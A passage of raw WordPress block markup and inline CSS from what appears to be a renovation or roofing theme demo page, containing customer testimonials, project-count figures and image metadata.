Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 